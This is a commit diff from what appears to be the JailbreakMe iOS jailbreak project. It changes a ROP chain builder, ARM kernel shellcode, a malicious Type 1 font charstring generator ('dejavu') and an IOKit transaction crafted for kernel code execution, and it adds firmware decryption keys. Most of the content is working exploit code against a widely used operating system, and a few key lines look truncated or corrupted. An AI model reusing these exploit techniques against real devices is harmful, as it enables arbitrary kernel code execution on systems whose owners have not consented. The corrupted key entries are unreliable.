RELEASE

comex · Jul 6, 2011 · bd67c89 · bd67c89
1 parent 60cf29f
commit bd67c89
Show file tree

Hide file tree

Showing 20 changed files with 255 additions and 112 deletions.
diff --git a/catalog/catalog.py b/catalog/catalog.py
@@ -20,6 +20,11 @@
 mode, device, version, cachefile, kernfile, patchfile, kcode, outfile = sys.argv[1:9]
 four_dot_three = '4.3' in version
 
+if four_dot_three:
+    memcpy = '_memcpy$VARIANT$CortexA' + ('9' if device.startswith('iPad2') else '8')
+else:
+    memcpy = '_memcpy'
+
 assert mode in ['dejavu', 'untether']
 patchfp = open(patchfile)
 
@@ -29,14 +34,18 @@ def add_lib(conn, short, path):
     lib_paths.add(path)
 
 debugging = True
+result_for = None
 
 def dbg_result():
+    global result_for
     if debugging:
+        if result_for is None:
+            result_for = ptr('Result for %s was %08x\n', True)
         result, resultp = stackunkpair()
         store_r0_to(resultp)
         back = sys._getframe().f_back
 
-        funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Result for %s:%d was %%08x\n' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True)
+        funcall('_fprintf', dmini.cur.sym('___stderrp'), result_for, ptr('%s:%d' % (back.f_code.co_filename, back.f_lineno), True), result, load_r0=True)
 
 dmini.init(kernfile, False)
 
@@ -59,14 +68,10 @@ def dbg_result():
 weirdfile = pointed(weirdfile + I(sysent, count) + stuff)
 
 def mov_r0_r6():
-    set_fwd('PC', dmini.cur.find('+ 30 46 70 bd'))
-    exhaust_fwd('R4', 'R5', 'R6')
-    heapadd(fwd('R4'), fwd('R5'), fwd('R6'), fwd('PC'))
+    gadget(PC='+ 30 46 70 bd', a='R4, R5, R6, PC')
 
 def str_r7_sp_856():
-    set_fwd('PC', dmini.cur.find('+ d6 97 e9 bd'))
-    exhaust_fwd('R0', 'R3', 'R5', 'R6', 'R7')
-    heapadd(fwd('R0'), fwd('R3'), fwd('R5'), fwd('R6'), fwd('R7'), fwd('PC'))
+    gadget(PC='+ d6 97 e9 bd', a='R0, R3, R5, R6, R7, PC')
 
 def seek_kernel_ldm(reg):
     s = chr(0x90 | reg) + chr(0xe8)
@@ -81,16 +86,16 @@ def seek_kernel_ldm(reg):
             if (i & 3) != 2: continue
             insn, = struct.unpack('I', data[i-2:i+2])
             regs = [b for (n, b) in enumerate(['R0', 'R1', 'R2', 'R3', 'R4', 'R5', 'R6', 'R7', 'R8', 'R9', 'R10', 'R11', 'R12', 'SP', 'LR', 'PC']) if (insn & (1 << n))]
-            if 'SP' not in regs or 'PC' not in regs: continue
-            if 'R0' in regs or 'R7' in regs: continue
+            if 'SP' not in regs or 'PC' not in regs or 'LR' not in regs: continue
+            if 'R0' in regs or 'R6' in regs or 'R7' in regs: continue
             # got it
             return (dmini.cur.nth_segment(seg).start + i - 2, regs)
 
         seg += 1
 
 
-# 12_41, 31_41, 31_421: R6
-kernel_ldm, kernel_ldm_regs = seek_kernel_ldm(11 if four_dot_three else 6)
+# 12_41, 31_41, 31_421: R6, no I lied
+kernel_ldm, kernel_ldm_regs = seek_kernel_ldm(11 if four_dot_three else 2)
 #kernel_ldm = 0xdeadbeef
 init(*kernel_ldm_regs)
 
@@ -100,6 +105,12 @@ def seek_kernel_ldm(reg):
 m = pointed('')
 set_fwd('SP', pointer(m))
 heapadd(m)
+
+# mov pc, r9
+set_fwd('PC', dmini.cur.find('- 1e ff 2f e1 1e ff 2f e1'))
+goo.fwds['PC'] = goo.fwds['LR']
+del goo.fwds['LR']
+
 mov_r0_r6()
 store_r0_to(obj)
 str_r7_sp_856()
@@ -111,8 +122,8 @@ def seek_kernel_ldm(reg):
 set_fwd('PC', code_addr)
 
 
-kstuff = finalize(None, must_be_simple=False, should_heapdump=False)
-kstuff += '\0'*(856 + 0x38 + 4 - len(kstuff)) # xxx offset
+kstuff = finalize(None, must_be_simple=False, should_heapdump=True); 
+kstuff.append('\0'*1024)
 
 def set_cache(cachefile):
     conn = dmini.Connection(cachefile, True)
@@ -159,10 +170,18 @@ def do_main_thing():
     funcall('_mach_task_self')
     store_r0_to(task_self_p)
 
-    set_r0_to(kstuffp); dbg_result()
+    if not four_dot_three:
+        funcall(memcpy, kstuffp, real_kstuffp, fake_kstuff_len)
+
+    #funcall(memcpy, kstuffp, ptrI(0xdeadbeef, pointer(m), 0, 0, 0, 0, 0, 0x80002000, 0xdeadbeef, 0xdeadbee0), fake_kstuff_len)
+
+    if debugging:
+        set_r0_to(kstuffp); dbg_result()
 
     # The manpage says this returns EINVAL, but in fact the kernel handles it.
-    funcall('_mlock', kstuffp, len(kstuff)); dbg_result()
+    funcall('_mlock', kstuffp, len(kstuff) if four_dot_three else (16 + fake_kstuff_len + len(kstuff))); dbg_result()
+
+    #funcall('_fprintf', dmini.cur.sym('___stderrp'), ptr('Opening %s\n', True), AppleRGBOUT, load_r0=True)
 
     funcall('iokit._IOServiceMatching', AppleRGBOUT)
     store_r0_to(matchingp)
@@ -172,7 +191,6 @@ def do_main_thing():
         funcall('iokit._IOServiceOpen', None, task_self, 0, connect); dbg_result()
     else:
         # http://www.opensource.apple.com/source/IOKitUser/IOKitUser-502/FireWireTest.cpp?txt
-        #itp = ptrI(0) # XXX this is just for testing
         portp = ptrI(0)
         funcall('_mach_task_self')
         funcall('_mach_port_allocate', None, 1, portp); dbg_result()
@@ -205,8 +223,6 @@ def do_main_thing():
 
     funcall('iokit._IOConnectCallStructMethod', connect, 5, transactionp, len(transaction), 0, 0, load_r0=True); dbg_result()
     #funcall('_sleep', 1000)
-    #dbg_result(); funcall('_abort')
-
 
     # do some housekeeping
     # (but don't bother if we're going to exec)
@@ -241,20 +257,26 @@ def do_main_thing():
 elif mode == 'dejavu':
     init('R4', 'R5', 'PC')
 
-kstuffp = ptr(kstuff + '\0'*32)
+if four_dot_three:
+    kstuffp = ptr(kstuff)
+else:
+    fake_kstuff_len = 4 * len(kernel_ldm_regs)
+    kstuffp = ptr('\0' * fake_kstuff_len, align=8, align_offset=6)
+    real_kstuffp = ptr(kstuff)
 zerop = ptrI(0)
-AppleRGBOUT = ptr('AppleM2TVOut' if device in ['iPhone2,1', 'iPod3,1'] else 'AppleRGBOUT', True)
+AppleRGBOUT = ptr('AppleM2CLCD' if device in ['iPhone2,1', 'iPod3,1'] else 'AppleRGBOUT', True) # if four_dot_three else 'AppleCLCD', True)
 connect = ptrI(0)
 fail_callback = ptrI(dmini.cur.sym('_getpid'), 0xeeeeeeee)
 
 transaction = troll_string('\x00' * (0xd8 if four_dot_three else 0x8c))
 transaction[0:4] = transaction[4:8] = I(0xeeeeeeee)
-transaction[8:0xc] = I(kstuffp) # surface saved in r11
 transaction[0x58:0x5c] = I(kernel_ldm)
 if four_dot_three:
     transaction[0xb8:0xbc] = I(6) # run iterations 1 and 2 (first loop bails at 1)
+    transaction[8:0xc] = I(kstuffp) # surface saved in r11
 else:
-    transaction[0x70:0x74] = I(6)
+    transaction[0x70:0x74] = I(kstuffp) # overlapping the address and "6"
+    transaction[8:0xc] = I(0xdeadbeef) # no idea
 transaction = simplify(transaction)
 transactionp = ptr(transaction)
 if mode == 'dejavu':
@@ -291,6 +313,6 @@ def do_main_thing():
     init_sp = 0x10031000
     address = 0x8000
 
-    final = finalize(address)
-    #heapdump(final)
+    final = finalize(address, should_heapdump=True)
     open(outfile, 'w').write(pickle.dumps({'segment': final, 'initializer': initializer, 'init_sp': init_sp, 'rop_address': address, 'libs': lib_paths, 'dylib': False}))
+
diff --git a/catalog/kcode.S b/catalog/kcode.S
@@ -8,14 +8,26 @@
 .arm
 start:
     # xxx offset
-    ldr sp, [sp, #(856 + 0x38 - 0x98)]
+    ldr sp, [sp, #(856 + 0x40 - 0xa0)]
     sub sp, #0x18
 
+#if 0
+    mov r5, sp; mov sp, #0x80000000; orr sp, #0x2000; mov pc, #-1
+#endif
+
+#if VERSION >= 0x040206 && VERSION < 0x040300
+    ldr r6, [sp, #(0x3c - 0x30 - 0x24)]
+#else
     ldr r6, [r4]
+#endif
 
     adr r0, inspiring
     bl _IOLog
 
+    #mov r0, #105
+    #mov r1, #9
+    #blx _proc_signal
+
     #mov r8, #0; b end
 
     adr r5, stuff
@@ -42,6 +54,14 @@ end:
     str r8, [r6, #c(0x238, 0x19c)]
     str r8, [r6, #c(0x2d4, 0x238)]
     # fix up linked lists
+#if 0 && (VERSION < 0x040300)
+    add r0, r6, #0x170
+    str r0, [r6, #0x170]
+    str r0, [r6, #0x174]
+    add r0, r6, #0x178
+    str r0, [r6, #0x178]
+    str r0, [r6, #0x17c]
+#endif
     add r0, r6, #c(0x218, 0x180)
     str r0, [r6, #c(0x21c, 0x184)]
     add r0, r6, #c(0x220, 0x188)
@@ -79,7 +99,7 @@ syscall_0:
     mov r1, #0
     str r1, [r0, #0xc]
     str r1, [r0, #0x10]
-    ldr r0, [r0, #0x6c]
+    ldr r0, [r0, #c(0x6c, 0x80)]
     cmp r0, #0
     strne r1, [r0, #8]
 #endif

diff --git a/common/common.h b/common/common.h
@@ -38,9 +38,9 @@ static void _assert_zero_helper(const char name[], const char *arg, unsigned int
 #endif
 
 #ifdef PROFILING
-#define TIME(thing) do { uint64_t _ta = time_ms(); thing; uint64_t _tb = time_ms(); _logI("[%.4ld ms] %s", (long int) (_tb - _ta), #thing); } while(0)
+#define TIME(thing...) do { uint64_t _ta = time_ms(); thing; uint64_t _tb = time_ms(); _logI("[%.4ld ms] %s", (long int) (_tb - _ta), #thing); } while(0)
 #else
-#define TIME(thing) thing
+#define TIME(thing...) do { thing; } while(0)
 #endif
 
 static inline uint64_t time_ms() {

diff --git a/config/keyz.txt b/config/keyz.txt
@@ -492,3 +492,54 @@ iPhone3,1_4.3.3_8J2.iBSS: 8ef00005aa2c01ae409d55e330171589af79d76ac86639e7600383
 iPhone3,1_4.3.3_8J2.iBEC: 54800715047034f61f786642e9caea65723ff410495dc68e7125c0519add859b e9467d0a0d35b1f2bcec6d0a60d0b499
 iPhone3,1_4.3.3_8J2.KernelCache: 65c351330f824889fe25b14e2d0cb5e291991a749f13761b825a70f317f005aa 301c0db0f6fc3a92c34f34b2dff5d92f
 
+iPhone3,3_4.2.6_8E200.fs: 723ded674deb1cba56a142542a0b06d2a483297f8056c0cfa70346c0724e1b0e03feded6
+iPhone3,3_4.2.6_8E200.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd
+iPhone3,3_4.2.6_8E200.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3
+iPhone3,3_4.2.6_8E200.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b
+iPhone3,3_4.2.6_8E200.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cbc47cb1f3
+iPhone3,3_4.2.6_8E200.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03
+iPhone3,3_4.2.6_8E200.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7
+iPhone3,3_4.2.6_8E200.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc
+iPhone3,3_4.2.6_8E200.GlyphCharging: 39c4f58aacb8f2a46ee43822befbc083313c2aa44bf7afc4d204d5d5aac6be2e 4cefae53fea79f566b70cbc5964a977e
+iPhone3,3_4.2.6_8E200.GlyphPlugin: 28b7fcbd208ee5e46c7cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741
+iPhone3,3_4.2.6_8E200.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c
+iPhone3,3_4.2.6_8E200.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4
+iPhone3,3_4.2.6_8E200.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45
+iPhone3,3_4.2.6_8E200.KernelCache: c31ace63b79048c5e1071201e07f8a6f23444e5062d57397a3b3d84ae68dc008 eef93c11b4795bb4b34ffb1cdd63713a
+iPhone3,3_4.2.6_8E200.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de8799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa
+iPhone3,3_4.2.6_8E200.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1
+
+iPhone3,3_4.2.7_8E303.fs: 612f78042ddc5337ab1abecfb59a07e88ed3e80665a035ef02c3c48045057fc29ab0a4b5
+iPhone3,3_4.2.7_8E303.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd
+iPhone3,3_4.2.7_8E303.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3
+iPhone3,3_4.2.7_8E303.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b
+iPhone3,3_4.2.7_8E303.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cbc47cb1f3
+iPhone3,3_4.2.7_8E303.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03
+iPhone3,3_4.2.7_8E303.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7
+iPhone3,3_4.2.7_8E303.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc
+iPhone3,3_4.2.7_8E303.GlyphCharging: 39c4f58aacb8f2a46ee43822befbc083313c2aa44bf7afc4d204d5d5aac6be2e 4cefae53fea79f566b70cbc5964a977e
+iPhone3,3_4.2.7_8E303.GlyphPlugin: 28b7fcbd208ee5e46c7cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741
+iPhone3,3_4.2.7_8E303.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c
+iPhone3,3_4.2.7_8E303.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4
+iPhone3,3_4.2.7_8E303.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45
+iPhone3,3_4.2.7_8E303.KernelCache: b953f74572156c933368875730f4d97ac09ba66d17dbcf1ef169894d35ceff61 72032759def5211d217f26473d668430
+iPhone3,3_4.2.7_8E303.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de8799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa
+iPhone3,3_4.2.7_8E303.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1
+
+iPhone3,3_4.2.8_8E401.fs: d8e162215f27c016ed8d1849c6059f99984c766c72cec4a1df63724491c8e5b19c0e6fb2
+iPhone3,3_4.2.8_8E401.AppleLogo: a777e9efde7fdcc159e326b52894ffc9bdceaf76f12ee35217184760231cebbf 090a5cd25ad4e1259a24463ff05882bd
+iPhone3,3_4.2.8_8E401.BatteryCharging0: f0c7d1bf7323fae1b5121a48fee51648508a756933b089464f3aec342f19b324 16ade54c2088416f30d6ee2fe562fac3
+iPhone3,3_4.2.8_8E401.BatteryCharging1: bf7f1e7b7c20037b7f46344f39aee9aa0bc44915f2d969fe2fd0f468d8ba4639 f8f2eaa2cd78fac06045d881c4d94c3b
+iPhone3,3_4.2.8_8E401.BatteryFull: 436a0f35c5c020cf1a437a71ab4105a1e1cd13a08efe662ac87581d958e7a3ae 0c8416323bc33d2c578317cb47cb1f3
+iPhone3,3_4.2.8_8E401.BatteryLow0: ff6a8aed51d7c687511d889f4b8dd39998e5cf3356271b5f75a983da4f383130 8ac48fe62a5cf7aba360985f71efaf03
+iPhone3,3_4.2.8_8E401.BatteryLow1: ef5248f463a0aae857acd29c63c450dd89a0c72d24cb80aacdf41344486875ad b5b8f816ba6c6b082c3ef23be1cf64c7
+iPhone3,3_4.2.8_8E401.DeviceTree: 33a34c5c90ba84db1eca20732378763678613475fe5a97531be7778b31185715 a997bc9a73be2c03c8527678cb62f0cc
+iPhone3,3_4.2.8_8E401.GlyphCharging:  
+iPhone3,3_4.2.8_8E401.GlyphPlugin: 28b7fcbd208ee5e467cf6838e4adb2256c91bd14938e3e317ab498b6e3b734e 6c6a35d4fea31bfe42039bab90562741
+iPhone3,3_4.2.8_8E401.iBEC: 9ef23dcdd8b6aa7e5629b21afa61509db4e3b144f1aef1fb9d3da3b1393695d6 3f8fcb789a234cab016256e7e664867c
+iPhone3,3_4.2.8_8E401.iBoot: acfb0f3c3c91a85721ee2d2951b5136e7a515cafd4549a37895fa51766887a37 ffe94b9f698a62c603bddf122cf25aa4
+iPhone3,3_4.2.8_8E401.iBSS: cabd9afa6d7678f3f95d0ccf43d18f54e4ee2e6ac8025b2a528f3b07579ec305 6863087c07128d170db61316205c5a45
+iPhone3,3_4.2.8_8E401.KernelCache: 21dc139511829abfb346d78f9c1c17d50bff33716e7619fee8338b99025ffa3e 851c4efdb0db569f39549e5a13e0784a
+iPhone3,3_4.2.8_8E401.LLB: 91579610b792e3ac351b8b5abcfb9933b19825b3a69de799a6f93d23cfd428b 69eac0a77661d8e3e7793f6e19b9ebaa
+iPhone3,3_4.2.8_8E401.RecoveryMode: 041ca7e51df14d14ffccec2f211437ed270b180d3d5b861c0a45f16cde59e79c 34eb95de77b4ba1f9e3d0929b59cfbe1
+
diff --git a/data b/data
diff --git a/dejavu/gen_dejavu.raw.py b/dejavu/gen_dejavu.raw.py
@@ -124,15 +124,15 @@ def encode_unknown(s):
 diffs_seen = set()
 
 for data in sorted(stuff, key=lambda d: d['personality'] - d['actual_parse_callback']):
-    diff = data['personality'] - data['actual_parse_callback']
+    diff = data['personality'] - data['actual_parse_callback'] - 1
     if diff in diffs_seen:
         raise Exception('duplicate')
     diffs_seen.add(diff)
 
     assert data['parse_callback'] > 32000
     assert data['actual_parse_callback'] > 32000
 
-    le_chain += str(subrno) + ' 1 1 25 callothersubr ' + xrepr_plus_small(diff, False, [4, 27]) + ' callothersubr\n'
+    le_chain += str(subrno) + ' 4 1 25 callothersubr ' + xrepr_plus_small(diff, False, [4, 27]) + ' callothersubr\n'
 
     subr = '''1 1 25 callothersubr             % get parse_callback
               {actual_pc} 2 21 callothersubr   % subtract the real one
@@ -203,7 +203,7 @@ def encode_unknown(s):
           0 0 0 3 0 callothersubr 
               2 2 24 callothersubr % buildchar -> bca[2]
 
-          -150 42 callothersubr % back up to 398 get gxx_personality_sj0
+          -152 42 callothersubr % back up to 398 get gxx_personality_sj0
           setcurrentpoint
           
           hstem3 hstem3 hstem3 hstem3
@@ -213,9 +213,19 @@ def encode_unknown(s):
           hstem3 hstem3 hstem3 hstem3
           hstem3 hstem3 hstem3 hstem3
           
-          252 42 callothersubr  % this had better get us to 20 (or actually 0!) down when it does 31000 stuff
+          %252 42 callothersubr  % this had better get us to 20 (or actually 0!) down when it does 31000 stuff
+
+          0 12 callothersubr % actually, enforce that we're at 0
           
           31000 3 2 24 callothersubr % idx = 31000
+
+          1 1 25 callothersubr       % first
+            1 1 25 callothersubr     % second
+              2 div                  % / 2
+              2 2 22 callothersubr   % * 2
+              2 21 callothersubr     % x - ((x / 2) * 2)
+            2 2 20 callothersubr     % + 2, so it's 1 or 2
+            callsubr
           
           3 callsubr           % flex again
           0 0 0 3 0 callothersubr  % personality
@@ -224,14 +234,6 @@ def encode_unknown(s):
               4 2 24 callothersubr % store to 4
             hmoveto % ignore x
 
-          1 1 25 callothersubr       % first
-            1 1 25 callothersubr     % second
-              2 div                  % / 2
-              2 2 22 callothersubr   % * 2
-              2 21 callothersubr     % x - ((x / 2) * 2)
-          callsubr
-
-
           {le_chain}
 
 

diff --git a/fs/fs.h b/fs/fs.h
@@ -17,7 +17,11 @@ uio_t x_uio_createwithbuffer(int a_iovcount, off_t a_offset, int a_spacetype, in
 void x_vnode_reclaim_internal(struct vnode * vp, int locked, int reuse, int flags) asm("$bl3__vnode_recycle");
 #define vnode_reclaim_internal x_vnode_reclaim_internal
 
-errno_t x_vn_create(vnode_t, vnode_t *, struct nameidata *, struct vnode_attr *, int flags, int mode, int unk, vfs_context_t) 
+#if VERSION >= 0x040300
+errno_t x_vn_create(vnode_t dvp, vnode_t *vpp, struct nameidata *ndp, struct vnode_attr *vap, int flags, int mode, int unk, vfs_context_t ctx) 
+#else
+errno_t x_vn_create(vnode_t dvp, vnode_t *vpp, struct componentname *cnp, struct vnode_attr *vap, int flags, vfs_context_t ctx)
+#endif
 asm("$strref_22_76_6e_6f_64_65_5f_63_72_65_61_74_65_3a_20_75_6e_6b_6e_6f_77_6e_20_76_74_79_70_65_20_25_64");
 // '"vnode_create: unknown vtype %d'
 #define vn_create x_vn_create
@@ -173,7 +177,9 @@ asm("$ldr_$_T_df_f8_fc_31_1b_68_6b_b1");
 #endif
 
 extern void IOLog(const char *fmt, ...) __attribute__((format (printf, 1, 2)));
-#if !DEBUG_PRINTF
+#if DEBUG_PRINTF
+#define printf IOLog
+#else
 #define printf(args...) ((void) (args))
 #endif
+2 −0		binary.h
+2 −1		find.c
+21 −4		mach-o/binary.c
+1 −0		mach-o/binary.h